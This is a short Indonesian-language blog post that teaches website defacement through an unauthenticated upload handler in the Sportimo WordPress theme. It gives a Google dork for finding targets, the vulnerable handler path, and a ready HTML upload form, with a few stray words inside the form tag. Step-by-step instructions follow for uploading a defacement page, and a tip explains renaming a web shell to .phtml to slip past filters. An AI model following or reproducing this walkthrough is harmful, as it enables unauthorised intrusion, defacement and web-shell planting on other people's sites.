Deface Menggunakan WordPress Themes sportimo
Bahan²
- Dork > inurl:/wp-content/themes/sportimo-theme/
- Exploit > /wp-content/themes/sportimo-theme/functions/upload-handler.php
- Csrf >
<form enctype="multipart/form-data"langsung sadja kuyy
action="127.0.0.1 /wp-content/themes/sportimo-theme/functions/upload-handler.php"
method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
pertama lu dorking dulu di google
lalu buka website yang mau lu deface
Lalu masukan exploitnya
lalu buka csrf kalian
Ubah yang 127.0.0.1 menjadi website yg vuln tadi
lalu simpan dengan ekstensi .html (misalnya f.html)
kemudian buka csrf nya
Jika sudah pilih script deface kalian
lalu tekan Upload
*note > jika ingin mengupload shell di bypass ke shell.phtml
Kalo Vuln keluar nama file kalian
lalu tinggal manggil hasil deface nya
> /wp-content/uploads/tahun/bulan/filelu.html
Post a Comment